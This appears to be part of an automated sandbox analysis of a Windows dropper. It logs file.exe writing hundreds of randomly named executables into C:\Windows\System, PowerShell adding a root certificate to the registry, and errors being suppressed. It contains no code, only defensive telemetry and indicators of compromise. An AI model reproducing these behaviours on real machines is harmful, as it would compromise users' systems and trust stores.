Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NzANgdB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hhEeZzN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAOVVjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vREuzRr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eLYbCEG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MgoHIfZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sFwDWFc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jqUGnrw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\usscfzm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rXBWFEL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJNkgSa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZDeifCM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mEVTdIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XqXHiyf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ajEytdP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PRQFErV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\blOLvcj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JGfFPYZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mZnsuql.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DrKJjXc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JRnaUrS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IBWzTMA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iSmvfWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bJVoOik.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VExclqz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mtnXczE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uwKMlqy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gQbnwXn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tXVZMjj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SYLAfii.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uBSPQKP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wWwDsEl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\brplcms.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyQdqmC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zJwJxgA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RKUSbZV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jkErNHB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rwUXwnj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gAPrxpM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GaSDvNs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zYyqoWF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iJpJhmt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PdxLXDE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LYzOvkf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uNQcZEb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ERbKWDm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\zzbooXY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QWtCxan.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ltlcnHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tzOEnrH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FaabrKu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SOFlTuM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RtRmRJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SxjZpBy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LPMtFlZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pPLiGBV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dmPtXnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QZBRXHU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ssUJwoR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ndpwHPZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lQcYvMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VPuwqFY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ihDRfqA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sctmwAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uJEYoyF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\defQfgC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XJEUdeq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rKZvlov.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VWrcuzM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVTiBjz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sPniyBl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wsmNUVo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lrIaMFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LKurWpq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HUohYxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MwFvbxc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\StIsyPE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WOvgLKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xsirwHn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ffPPQcz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVJdttA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VLekFWd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CpMhLMx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGUHzJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NuxBytj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gXwIlxx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HNocQDn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ftWkAMN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJFWveO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rfpCYxf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xZqqKxJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UiAsnNy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HEPcUok.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fXSZuyj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ArNQyZf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hAjIjRa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rDRaLhy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UyqOZIb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTrjeti.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AONeoTK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RgcKJVt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gPTriDK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bymvMyH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XBXKJRi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\osHoaGO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eQlnkhq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LNyWtrn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZlvPlxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xVIixqx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JCZRmvQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sHbEZkY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rVmcjTa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aIuDozC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DtVOaSb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RCVCpIi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vyHGCnK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IEswIyo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IjDqKMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iEDLgeS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qmcblFN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZCyEzte.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ztQluWW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vixYnHG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PPOtBBY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZohDODH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tyXEsEa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FUwHkXo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AbenojY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mlhNNPN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMaKiZu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BMxbfij.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OVdNTki.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NVxCwjX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FHjAcHx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\glgdLrR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jtnQpnb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pbwrbNh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HbWODob.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WVsCsMZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgBtrMU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TBNKhIN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TQUlNhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\izzcVgF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mbSqRHL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lyMiIxb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\veVfAiw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HVhldsH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZPBkGsL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZXNyiNu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sGYPztO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIXgzbs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FGSooXz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yzVBTwc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\chBMsUn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EDndQMl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uxMRJKa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OyxgWny.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fhxlOMT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bxBimDh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mPNsbfH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WZkiNdG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nkFLDPI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yolnOnG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SUucMiy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFpkhGM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AOSuUmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DNhkeWm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\svRRwoZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nKUJunm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HuKkgJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mBbgLGb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DCqXTox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PbUiiSM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VsobEcA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CVYvaQs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KeLPRxW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tWOQBIk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mshbGSl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ccbrmxM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sJZigTD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvowvSL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BnLcQMe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkazDeV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mdMaqgD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rTpsbWr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cBoEBlV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NqPZXyD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dbgHMyC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cyvijMt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ykZgpGK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UqXZtcb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YIjJOqk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JqFVNbS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wNVvJxX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oCLXTVT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dPvMBBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WCbcoxD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CoTJSDT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wnWUbPS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ZFvVqBc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VjXLpYb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lVudyTV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WdIXuil.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DBfMBcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iYYYydA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XbARtow.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vKoIcLB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAngvPh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wPprRzW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xyokMuX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ckHJCFb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\imwRXsl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kPkYoOt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FlmGZHf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pnGqAlS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HHsWpNX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LFQLRaY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ghXRScL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VHwkuIa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HjdahEF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pMMnfcQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aFbtfKK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hzIYZSD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QqSzknx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LTWTGcY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LLELsGo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eIthybV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LCScugy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eaXsKmO.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQPgIol.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NrRaZIJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DTVvNoy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\lBrohsB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hyzwXgh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sdTevgk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\skgGGJN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nJZyUBH.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ucDGEkw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AXEGSHs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JdmbeCb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\hMvDOJd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\nWSykjl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pGmaKvE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EENzfBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QrBMIBp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NDapyRM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CGpcHNw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pBTelAj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GoSpvOG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bsgTRXG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\tJmWuwF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jmSIZKC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OgBLDNx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yuTigyc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dMXkTWG.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\cVpmxhg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mByREeI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rtBLYbw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EzVUaNc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EZbURBQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\geBTNDq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TVNHEGY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PjowoJp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bzSbRdi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FoekgWP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sDLqeeh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bFsdWPU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WvkREuJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\aBqatWR.exe	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\System\xIpouRJ.exe

4_2_00007FF66685EBF0

Stores large binary data to the registry

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
